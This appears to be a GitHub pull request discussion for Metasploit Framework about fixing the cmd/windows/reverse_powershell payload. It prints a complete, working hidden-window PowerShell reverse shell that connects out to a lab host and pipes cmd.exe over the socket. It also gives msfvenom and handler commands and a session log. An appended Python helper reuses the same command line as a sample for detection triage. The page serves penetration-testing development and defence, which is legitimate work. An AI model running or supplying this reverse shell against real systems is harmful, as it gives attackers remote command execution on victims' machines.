
fix #12579, fix the cmd/windows/reverse_powershell payload #12945

Merged
merged 3 commits into from Feb 21, 2020

Conversation

@timwr timwr (Contributor) commented Feb 18, 2020

This pull request fixes the cmd/windows/reverse_powershell payload so that it can pass output data to the socket asynchronously.

At the time of writing you do not need to disable Windows Defender :trollface: (until you do `session -u`)

Verification

  • Ensure cmd_exec tests pass:
use exploit/multi/handler
set LHOST 192.168.56.1
set LPORT 4444
set ExitOnSession false
set payload windows/powershell_reverse_tcp
run -jz

# Get a session on Windows:
# msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.56.1 LPORT=4444 -o powershell.bat 

loadpath test/modules
use post/test/cmd_exec
set SESSION -1
set VERBOSE true
run
  • Ensure session -u 1 works now
  • Check the payload is still stable (e.g. no 100% CPU usage, killing cmd.exe kills the session, killing the socket kills cmd.exe, etc.)

@timwr timwr added the cmd_exec is broken again cmd_exec is broken again label Feb 18, 2020
@wvu wvu requested a review from bwatters-r7 February 18, 2020 05:26
@bwatters-r7 bwatters-r7 self-assigned this Feb 18, 2020
@timwr timwr changed the title fix #12579, fix cmd_exec on cmd/windows sessions fix #12579, fix the cmd/windows/reverse_powershell payload Feb 18, 2020
$c=New-Object system.net.sockets.tcpclient;
$nb=New-Object System.Byte[] $c.ReceiveBufferSize;
$ob=New-Object System.Byte[] 65536;
$e=new-object System.Text.AsciiEncoding;

+1 vote for the use of System.Text.UTF8Encoding instead?

$e = new-object System.Text.UTF8Encoding;

Be sure to use the above instead of System.Text.Encoding.UTF8 to avoid Byte Order Mark support.

@bwatters-r7

Release Notes

This PR switches the powershell payload to an asynchronous read, preventing some issues where we return before we have a message.

@bcoles bcoles (Contributor) commented Feb 21, 2020

This PR appears to have fixed the issue by breaking cmd/windows/reverse_powershell.

A session is created, but there's no command prompt banner, and commands aren't executed.

./msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.191.165 LPORT=1337
powershell -w hidden -nop -c $a='172.16.191.165';$b=1337;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);$esread=$es.BaseStream.ReadAsync($eb, 0, $eb.Length);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $s.Write($ob,0,$osread.Result);      $s.Flush();      $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $s.Write($eb,0,$esread.Result);      $s.Flush();      $esread = $es.BaseStream.ReadAsync($eb, 0, $eb.Length);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {        break;    };    if ($p.ExitCode -ne $null) {        break;    };};

Windows 7 SP1 (x64).

msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                         Payload opts
  --  ----                    -------                         ------------
  1   Exploit: multi/handler  cmd/windows/reverse_powershell  tcp://172.16.191.165:1337

msf5 exploit(multi/handler) > [*] Command shell session 4 opened (172.16.191.165:1337 -> 172.16.191.242:50023) at 2020-02-21 04:37:40 -0500

msf5 exploit(multi/handler) > Interrupt: use the 'exit' command to quit
msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

dir





whoami
pwd







^C
Abort session 4? [y/N]  y
""

[*] 172.16.191.242 - Command shell session 4 closed.  Reason: User exit
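For responders who meet this payload in a process-creation or script-block log, here is an added Python triage helper (not part of the PR or of Metasploit) that pulls the listener host and port, the spawned program and the tell-tale API tokens out of a command line like the one msfvenom printed above; the first sample is that exact command line, the benign second sample is constructed.

```python
import re

# Command line exactly as msfvenom printed it in the comment above (the page's own sample).
SAMPLE_CMDLINE = "powershell -w hidden -nop -c $a='172.16.191.165';$b=1337;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);$esread=$es.BaseStream.ReadAsync($eb, 0, $eb.Length);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $s.Write($ob,0,$osread.Result);      $s.Flush();      $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $s.Write($eb,0,$esread.Result);      $s.Flush();      $esread = $es.BaseStream.ReadAsync($eb, 0, $eb.Length);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {        break;    };    if ($p.ExitCode -ne $null) {        break;    };};"

# Constructed benign command line for comparison (not from the page).
BENIGN_CMDLINE = "powershell -nop -c Get-Process | Export-Csv C:\\temp\\procs.csv"

# Tokens that, taken together, characterise this payload: an outbound TCP client,
# a child cmd.exe with redirected pipes, the async pipe reads this PR introduced,
# and the socket-close poll. Matched case-insensitively.
INDICATORS = [
    ("tcp_client", "system.net.sockets.tcpclient"),
    ("child_process", "system.diagnostics.process"),
    ("stdin_redirect", "redirectstandardinput=1"),
    ("async_pipe_read", ".basestream.readasync("),
    ("socket_poll", "selectmode]::selectread"),
    ("hidden_window", "-w hidden"),
    ("no_profile", "-nop"),
]


def triage(cmdline: str) -> dict:
    """Extract listener endpoint, spawned program and indicator hits from a PowerShell command line."""
    lower = cmdline.lower()
    hits = [name for name, token in INDICATORS if token in lower]
    # The generated one-liner always starts with $a='<host>';$b=<port>;
    endpoint = re.search(r"\$a='([^']+)';\$b=(\d+);", cmdline)
    spawned = re.search(r"\.FileName='([^']+)'", cmdline)
    return {
        "remote_host": endpoint.group(1) if endpoint else None,
        "remote_port": int(endpoint.group(2)) if endpoint else None,
        "spawned": spawned.group(1) if spawned else None,
        "indicators": hits,
        # A socket plus a child process with redirected stdin is the reverse-shell core;
        # the window and profile flags alone are far too common to act on.
        "reverse_shell": {"tcp_client", "child_process", "stdin_redirect"} <= set(hits),
    }


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(triage(line))
```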

bwatters-r7 added a commit to bwatters-r7/metasploit-framework that referenced this pull request Feb 21, 2020
…load"

This reverts commit 564895e, reversing
changes made to c1b2762.

This appears to make it worse.
@tperry-r7 tperry-r7 added the rn-fix release notes fix label Mar 3, 2020